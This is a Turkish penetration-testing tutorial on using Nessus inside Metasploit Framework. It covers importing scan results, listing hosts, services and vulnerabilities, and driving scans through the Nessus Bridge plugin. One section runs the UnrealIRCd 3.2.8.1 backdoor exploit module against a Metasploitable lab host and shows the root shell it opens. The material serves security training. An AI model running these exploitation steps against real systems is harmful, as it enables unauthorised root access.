MSF İçinde Nessus Kullanmak

Estimated read time 11 min read

Nessus nedir?

Nessus, kişisel ve ticari olmayan kullanım için ücretsiz olarak edinilebilen bir zafiyet tarama programıdır. Tenable firması tarafından geliştirilmekte olan Nessus tarama programını ve sonuçlarını Metasploit Framework içerisinde kullanabilirsiniz. Bu yazıda, genel hatlarıyla Nessus programının Metasploit Framework içerisinde kullanımını göreceğiz.

Nessus Sonuçlarını İçe Aktarma

Nessus arayüzünde bir tarama yaptıktan sonra, sonuçları .nbe formatında kayıt edebilirsiniz. Bu dosyayı Metasploit Framework için db_import komutuyla aktaralım.

msf > db_import /root/Nessus/nessus_scan.nbe
[*] Importing 'Nessus NBE Report' data
[*] Importing host 172.16.194.254
[*] Importing host 172.16.194.254
[*] Importing host 172.16.194.254
[*] Importing host 172.16.194.2
[*] Importing host 172.16.194.2
[*] Importing host 172.16.194.2
...snip...
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Successfully imported /root/Nessus/nessus_scan.nbe
msf > 

hosts Kontrolü

İçe aktarma işleminden sonra, hostskomutuyla tabloya kayıt edilen IP adreslerini kontrol edelim.

msf > hosts

Hosts
=====

address     mac name  os_name                                       os_flavor os_sp purpose info comments
-------     --- ----  -------                                       --------- ----- ------- ---- --------
172.16.194.1         one of these operating systems : \nMac OS X 10.5\nMac OS X 10.6\nMac OS X 10.7\n           device     
172.16.194.2         Unknown                                                device     
172.16.194.134        Microsoft Windows                                  XP     SP2  client     
172.16.194.148        Linux Kernel 2.6 on Ubuntu 8.04 (hardy)\n                               device     
172.16.194.163        Linux Kernel 3.2.6 on Ubuntu 10.04\n                                 device     
172.16.194.165    phpcgi Linux phpcgi 2.6.32-38-generic-pae #83-Ubuntu SMP Wed Jan 4 12:11:13 UTC 2012 i686          device     
172.16.194.172        Linux Kernel 2.6 on Ubuntu 8.04 (hardy)\n                               device                                                                     

msf >

services Kontrolü

Ayrıca, services komutuyla, bulunan IP adreslerinde çalışan servisleri görüntüleyelim.

msf > services 172.16.194.172

Services
========

host      port  proto name      state info
----      ----  ----- ----      ----- ----
172.16.194.172 21   tcp  ftp       open  
172.16.194.172 22   tcp  ssh       open  
172.16.194.172 23   tcp  telnet     open  
172.16.194.172 25   tcp  smtp      open  
172.16.194.172 53   udp  dns       open  
172.16.194.172 53   tcp  dns       open  
172.16.194.172 69   udp  tftp      open  
172.16.194.172 80   tcp  www       open  
172.16.194.172 111  tcp  rpc-portmapper open  
172.16.194.172 111  udp  rpc-portmapper open  
172.16.194.172 137  udp  netbios-ns   open  
172.16.194.172 139  tcp  smb       open  
172.16.194.172 445  tcp  cifs      open  
172.16.194.172 512  tcp  rexecd     open  
172.16.194.172 513  tcp  rlogin     open  
172.16.194.172 514  tcp  rsh       open  
172.16.194.172 1099  tcp  rmi_registry  open  
172.16.194.172 1524  tcp          open  
172.16.194.172 2049  tcp  rpc-nfs     open  
172.16.194.172 2049  udp  rpc-nfs     open  
172.16.194.172 2121  tcp  ftp       open  
172.16.194.172 3306  tcp  mysql      open  
172.16.194.172 5432  tcp  postgresql   open  
172.16.194.172 5900  tcp  vnc       open  
172.16.194.172 6000  tcp  x11       open  
172.16.194.172 6667  tcp  irc       open  
172.16.194.172 8009  tcp  ajp13      open  
172.16.194.172 8787  tcp          open  
172.16.194.172 45303 udp  rpc-status   open  
172.16.194.172 45765 tcp  rpc-mountd   open  
172.16.194.172 47161 tcp  rpc-nlockmgr  open  
172.16.194.172 50410 tcp  rpc-status   open  
172.16.194.172 52843 udp  rpc-nlockmgr  open  
172.16.194.172 55269 udp  rpc-mountd   open 

vulns Kontrolü

vulns komutuyla, Bu Ip adreslerinde çalışan servislere ait varsa zafiyetleri listeleyelim. vulns komutuyla listeleme yaparken çeşitli filtreleme seçeneklerini kullanabilirsiniz. Bunları help vulns komutuyla incelemenizi tavsiye ediyorum.

msf > help vulns
Print all vulnerabilities in the database

Usage: vulns [addr range]

 -h,--help       Show this help information
 -p,--port >portspec> List vulns matching this port spec
 -s >svc names>    List vulns matching these service names
 -S,--search      Search string to filter by
 -i,--info       Display Vuln Info

Examples:
 vulns -p 1-65536     # only vulns with associated services
 vulns -p 1-65536 -s http # identified as http on any port

msf >

IP adreslerinde, 139 numaralı Portlara ait zafiyetleri görelim.

msf > vulns -p 139
[*] Time: 2012-06-15 18:32:26 UTC Vuln: host=172.16.194.134 name=NSS-11011 refs=NSS-11011 
[*] Time: 2012-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-11011 refs=NSS-11011 

msf > vulns -p 22
[*] Time: 2012-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-10267 refs=NSS-10267 
[*] Time: 2012-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-22964 refs=NSS-22964 
[*] Time: 2012-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-10881 refs=NSS-10881 
[*] Time: 2012-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-39520 refs=NSS-39520 
[*] Time: 2012-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-39520 refs=NSS-39520 
[*] Time: 2012-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-25221 refs=NSS-25221 
[*] Time: 2012-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-10881 refs=NSS-10881 
[*] Time: 2012-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-10267 refs=NSS-10267 
[*] Time: 2012-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-22964 refs=NSS-22964 
[*] Time: 2012-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-39520 refs=NSS-39520 
[*] Time: 2012-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-10881 refs=NSS-10881 
[*] Time: 2012-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-32314 refs=CVE-2008-0166,BID-29179,OSVDB-45029,CWE-310,NSS-32314 
[*] Time: 2012-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-10267 refs=NSS-10267 
[*] Time: 2012-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-22964 refs=NSS-22964 

172.16.194.172 IP adresine ait 6667 numaralı porta ait zafiyetleri görelim.

msf > vulns 172.16.194.172 -p 6667
[*] Time: 2012-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-46882 refs=CVE-2010-2075,BID-40820,OSVDB-65445,NSS-46882 
[*] Time: 2012-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-11156 refs=NSS-11156 
[*] Time: 2012-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-17975 refs=NSS-17975 
msf >

6667 numaralı porta ait zafiyet olarak listelenen cve:2010-2075 zafiyetine ait Metasploit Framework modüllerinde herhangi bir modül var mı? Aratalım.

msf > search cve:2010-2075

Matching Modules
================

  Name                    Disclosure Date Rank    Description
  ----                    --------------- ----    -----------
  exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12    excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution


msf >

Arama sonucunda, exploit/unix/irc/unreal_ircd_3281_backdoor isimli bir exploit modülü bulunduğunu görüyoruz. Şimdi bu modülü kullanalım.

msf use exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 172.16.194.172:6667...
  :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
  :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Q4SefN7pIVSQUL2F;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Q4SefN7pIVSQUL2F\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:35941) at 2012-06-15 15:08:51 -0400

ifconfig
eth0   Link encap:Ethernet HWaddr 00:0c:29:d1:62:80 
     inet addr:172.16.194.172 Bcast:172.16.194.255 Mask:255.255.255.0
     inet6 addr: fe80::20c:29ff:fed1:6280/64 Scope:Link
     UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
     RX packets:290453 errors:0 dropped:0 overruns:0 frame:0
     TX packets:402340 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:1000 
     RX bytes:41602322 (39.6 MB) TX bytes:344600671 (328.6 MB)
     Interrupt:19 Base address:0x2000 

lo    Link encap:Local Loopback 
     inet addr:127.0.0.1 Mask:255.0.0.0
     inet6 addr: ::1/128 Scope:Host
     UP LOOPBACK RUNNING MTU:16436 Metric:1
     RX packets:774 errors:0 dropped:0 overruns:0 frame:0
     TX packets:774 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:0 
     RX bytes:343253 (335.2 KB) TX bytes:343253 (335.2 KB)

id
uid=0(root) gid=0(root)

Exploit modülünün kullanımı ile Hedef IP adresinde bir komut satırı açılmıştır.

Nessus Programını Doğrudan MSF İçinden Kullanma

Önceki bölümde, Nessus programının yaptığı bir taramayı .nbe formatında kaydedip, Metasploit içerisine aktarım kullanmıştık. Komut satırını kullanmayı seviyorsanız, Nessus programını doğrudan komut satırından da kullanabilirsiniz. Bunun gerçekleşebilmesi için Metasploit Framework için geliştirilen Nessus Bridge Plugin isimli bir eklenti bulunmaktadır.

Nessus Bridge Eklentisi Başlatma

msfconsole içerisinden Nessus kullanım için gerekli eklentiyi yükleyelim.

msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

Bu eklentinin bize sunduğu komutları görmek için, nessus_help yardım komutunu görüntüleyelim.

msf > nessus_help
[+] Nessus Help
[+] type nessus_help command for help with specific commands

Command          Help Text
-------          ---------
Generic Commands     
-----------------     -----------------
nessus_connect       Connect to a nessus server
nessus_logout       Logout from the nessus server
nessus_help        Listing of available nessus commands
nessus_server_status    Check the status of your Nessus Server
nessus_admin        Checks if user is an admin
nessus_server_feed     Nessus Feed Type
nessus_find_targets    Try to find vulnerable targets from a report
             
Reports Commands     
-----------------     -----------------
nessus_report_list     List all Nessus reports
nessus_report_get     Import a report from the nessus server in Nessus v2 format
nessus_report_hosts    Get list of hosts from a report
nessus_report_host_ports  Get list of open ports from a host from a report
nessus_report_host_detail Detail from a report item on a host
             
Scan Commands       
-----------------     -----------------
nessus_scan_new      Create new Nessus Scan
nessus_scan_status     List all currently running Nessus scans
...snip...

Nessus Sunucuya Bağlanma

msfconsole içerisinden Nessus programına komut gönderebilmek için öncelikle Nessus sunucuya bağlanmamız gerekmektedir. Bunun için nessus_connect dook:s3cr3t@192.168.1.100 ok komut şablonunu kullanıyoruz. Burada dook Nessus için kullandığınız kullanıcı adınız , s3cr3t Nessus parolanızdır. 192.168.1.100 IP adresi yerine, sisteminizde Nessus sunucunun çalıştığı IP adresini yazmalısınız. Komutun sonundaki ok parametresi, Nessus’a dışarıdan bağlandığınızı ve güvenlik ikazını kabul ettiğinizi onaylamak için zorunludur.

msf > nessus_connect dook:s3cr3t@192.168.1.100
[-] Warning: SSL connections are not verified in this release, it is possible for an attacker
[-]     with the ability to man-in-the-middle the Nessus traffic to capture the Nessus
[-]     credentials. If you are running this on a trusted network, please pass in 'ok'
[-]     as an additional parameter to this command.
msf > nessus_connect dook:s3cr3t@192.168.1.100 ok
[*] Connecting to https://192.168.1.100:8834/ as dook
[*] Authenticated
msf >

Nessus Tarama Politikalarını Görüntüleme

Nessus sunucuda bulunan tarama politikalarını nessus_policy_list komutuyla görüntüleyelim. Herhangi bir tarama politikanız yoksa, Nessus Görsel arayüzüne giderek oluşturmanız gerekmektedir.

msf > nessus_policy_list
[+] Nessus Policy List

ID Name    Owner visability
-- ----    ----- ----------
1  the_works dook  private

msf >

Nessus İle Yeni Bir Tarama Başlatma

Artık tarama politikalarını da görüntüledikten sonra yeni bir tarama başlatabiliriz. Taramayı başlatmak için nessus_scan_new komutu kullanılır. Komut, nessus_scan_newidscan nametargets parçalarından oluşur. Aşağıda örneğini görebilirsiniz.

msf > nessus_scan_new
[*] Usage:
[*]    nessus_scan_new policy id scan name targets
[*]    use nessus_policy_list to list all available policies


msf > nessus_scan_new 1 pwnage 192.168.1.161
[*] Creating scan from policy number 1, called "pwnage" and scanning 192.168.1.161
[*] Scan started. uid is 9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f
msf >

Devam Eden Tarama Durumunu Görüntüleme

nessus_scan_new komutuyla başlattığınız taramanın ne durumda olduğunu, nessus_scan_status komutuyla kontrol edebilirsiniz.

msf > nessus_scan_status
[+] Running Scans

Scan ID                        Name  Owner Started      Status  Current Hosts Total Hosts
-------                        ----  ----- -------      ------  ------------- -----------
9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f pwnage dook  19:39 Sep 27 2010 running 0       1


[*] You can:
[+]     Import Nessus report to database :   nessus_report_get reportid
[+]     Pause a nessus scan :       nessus_scan_pause scanid
msf > nessus_scan_status
[*] No Scans Running.
[*] You can:
[*]     List of completed scans:     nessus_report_list
[*]     Create a scan:          nessus_scan_new policy id scan name target(s)
msf >

Tarama Sonucunu Alma

Nessus taraması tamamlandığında kendi içinde bir rapor oluşturur. Metasploit Framework içine alınabilecek raporların listesini nessus_report_list komutuyla görüntüleyelim. Ardından, raporun ID numarasını vererek, nessus_report_get komutuyla msfconsole içine ithal edelim.

msf > nessus_report_list
[+] Nessus Report List

ID                          Name  Status   Date
--                          ----  ------   ----
9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f pwnage completed 19:47 Sep 27 2010

[*] You can:
[*]     Get a list of hosts from the report:     nessus_report_hosts report id


msf > nessus_report_get
[*] Usage:
[*]    nessus_report_get report id
[*]    use nessus_report_list to list all available reports for importing


msf > nessus_report_get 9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f
[*] importing 9d337e9b-82c7-89a1-a194-4ef154b82f624de2444e6ad18a1f
msf >

Sonuçları Görüntüleme

İçeri aktarılan tarama sonuçlarını, önceki bölümde olduğu gibi hostsservices ve vulns komutlarıyla görüntüleyebilirsiniz.

msf > hosts -c address,vulns

Hosts
=====

address    vulns
-------    -----
192.168.1.161 33
msf > vulns
[*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 port=3389 proto=tcp name=NSS-10940 refs=
[*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 port=1900 proto=udp name=NSS-35713 refs=
[*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 port=1030 proto=tcp name=NSS-22319 refs=
[*] Time: 2010-09-28 01:51:37 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-10396 refs=
[*] Time: 2010-09-28 01:51:38 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-10860 refs=CVE-2000-1200,BID-959,OSVDB-714
[*] Time: 2010-09-28 01:51:38 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-10859 refs=CVE-2000-1200,BID-959,OSVDB-715
[*] Time: 2010-09-28 01:51:39 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-18502 refs=CVE-2005-1206,BID-13942,IAVA-2005-t-0019
[*] Time: 2010-09-28 01:51:40 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-20928 refs=CVE-2006-0013,BID-16636,OSVDB-23134
[*] Time: 2010-09-28 01:51:41 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NSS-35362 refs=CVE-2008-4834,BID-31179,OSVDB-48153
[*] Time: 2010-09-28 01:51:41 UTC Vuln: host=192.168.1.161
...snip...